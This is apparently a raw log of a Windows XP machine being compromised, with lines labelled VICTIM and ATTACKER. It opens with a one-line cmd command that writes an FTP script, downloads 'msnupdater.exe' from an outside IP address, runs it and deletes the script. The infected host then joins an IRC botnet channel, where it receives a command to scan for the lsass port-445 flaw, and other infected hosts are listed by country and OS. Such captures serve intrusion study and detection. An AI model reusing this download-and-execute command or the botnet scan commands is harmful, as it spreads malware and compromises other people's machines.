VICTIM: Microsoft Windows XP [Version 5.1.2600] VICTIM: (C) Copyright 1985-2001 Microsoft Corp.C:\\WINDOWS\\system32> ATTACKER: echo open 118.172.242.90 13110 > o&echo user 1 1 >> o &echo get msnupdater.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &msnupdater.exe ATTACKER: 220 StnyFtpd 0wns j0 VICTIM: USER 1 ATTACKER: 331 Password required VICTIM: PASS 1 ATTACKER: 230 User logged in. VICTIM: PORT 192,168,1,194,4 ATTACKER: 200 PORT command successful. ATTACKER: RETR msnupdater.exe ATTACKER: 150 Opening BINARY mode data connection ATTACKER: 226 Transfer complete. VICTIM: QUIT ATTACKER: 221 Goodbye happy r00ting. VICTIM: PASS chikichiki VICTIM: NICK N00|10|USA|XPSP0|SYSTEM|DLUSER scs 0 0 :N00|10|USA|XPSP0|SYSTEM|DL ATTACKER: :skathari.oligarxia.com NOTICE AUTH :*** Looking up your hostname... ATTACKER: :skathari.oligarxia.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead ATTACKER: :skathari.oligarxia.com 001 N00|10|USA|XPSP0|SYSTEM|DL :Welcome to the SKATHARI IRC Network N00|10|USA|XPSP0|SYSTEM|DL!scs@192.168.1.194:skathari.oligarxia.com 002 N00|10|USA|XPSP0|SYSTEM|DL :Your host is skathari.oligarxia.com, running version Unreal3.2.7:skathari.oligarxia.com 003 N00|10|USA|XPSP0|SYSTEM|DL :This server was created Wed Jun 4 2008 at 20:31:46 CEST:skathari.oligarxia.com 004 N00|10|USA|XPSP0|SYSTEM|DL skathari.oligarxia.com Unreal3.2.7 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj:skathari.oligarxia.com 005 N00|10|USA|XPSP0|SYSTEM|DL NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server:skathari.oligarxia.com 005 N00|10|USA|XPSP0|SYSTEM|DL WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=SKATHARI CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server:skathari.oligarxia.com 005 N00|10|USA|XPSP0|SYSTEM|DL CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server:skathari.oligarxia.com 251 N00|10|USA|XPSP0|SYSTEM|DL :There are 36 users and 20 invisible on 1 servers:skathari.oligarxia.com 254 N00|10|USA|XPSP0|SYSTEM|DL 5 :channels formed:skathari.oligarxia.com 255 N00|10|USA|XPSP0|SYSTEM|DL :I have 56 clients and 0 servers:skathari.oliga ATTACKER: rxia.com 265 N00|10|USA|XPSP0|SYSTEM|DL :Current Local Users: 56 Max: 233:skathari.oligarxia.com 266 N00|10|USA|XPSP0|SYSTEM|DL :Current Global Users: 56 Max: 233:skathari.oligarxia.com 422 N00|10|USA|XPSP0|SYSTEM|DL :MOTD File is missing:N00|10|USA|XPSP0|SYSTEM|DL MODE N00|10|USA|XPSP0|SYSTEM|DL :+iwx VICTIM: USERHOST N00|10|USA|XPSP0|SYSTEM|DL ATTACKER: :skathari.oligarxia.com 302 N00|10|USA|XPSP0|SYSTEM|DL :N00|10|USA|XPSP0|SYSTEM|DL=+scs@192.168.1.194 VICTIM: MODE N00|10|USA|XPSP0|SYSTEM|DL +xJOIN #vzop haxUSERHOST N00|10|USA|XPSP0|SYSTEM|DLMODE N00|10|USA|XPSP0|SYSTEM|DL +xJOIN #vzop haxUSERHOST N00|10|USA|XPSP0|SYSTEM|DLMODE N00|10|USA|XPSP0|SYSTEM|DL +xJOIN #vzop haxUSERHOST N00|10|USA|XPSP0|SYSTEM|DLMODE N00|10|USA|XPSP0|SYSTEM|DL +xJOIN #vzop hax ATTACKER: :N00|10|USA|XPSP0|SYSTEM|DL!scs@FF7E1BCA.EC295C9B.E92347E7.IP JOIN :#vzop:skathari.oligarxia.com 332 N00|10|USA|XPSP0|SYSTEM|DL #vzop :.find lsass-445 35 5 1000 x.x.x.x:skathari.oligarxia.com 333 N00|10|USA|XPSP0|SYSTEM|DL #vzop scorpions 1216624912:skathari.oligarxia.com 353 N00|10|USA|XPSP0|SYSTEM|DL @ #vzop :N00|10|USA|XPSP0|SYSTEM|DL N00|118|THA|XPSP2|Administrato N00|192|USA|UNSP1|hhinde|UY N00|192|USA|XPSP2|Owner|UD N00|192|USA|XPSP2|HP_Administr N02|192|USA|XPSP3|Admin|DG N00|931|DEU|XPSP2|Administrato N00|192|USA|UNSP1|Toshiba|NG N04|192|AUS|XPSP2|Steven|SW N10|192|GBR|XPSP2|Compaq_Owner :skathari.oligarxia.com 366 N00|10|USA|XPSP0|SYSTEM|DL #vzop :End of /NAMES list.:skathari.oligarxia.com 302 N00|10|USA|XPSP0|SYSTEM|DL :N00|10|USA|XPSP0|SYSTEM|DL=+scs@192.168.1.194 :skathari.oligarxia.com 302 N00|10|USA|XPSP0|SYSTEM|DL :N00|10|USA|XPSP0|SYSTEM|DL=+scs@192.168.1.194 VICTIM: PRIVMSG #vzop :-=|SCAN|=- Random Method started at x.x.x.x :lsass-445 for 1000 minutes 5 delay 35 threads ATTACKER: :skathari.oligarxia.com 302 N00|10|USA|XPSP0|SYSTEM|DL :N00|10|USA|XPSP0|SYSTEM|DL=+scs@192.168.1.194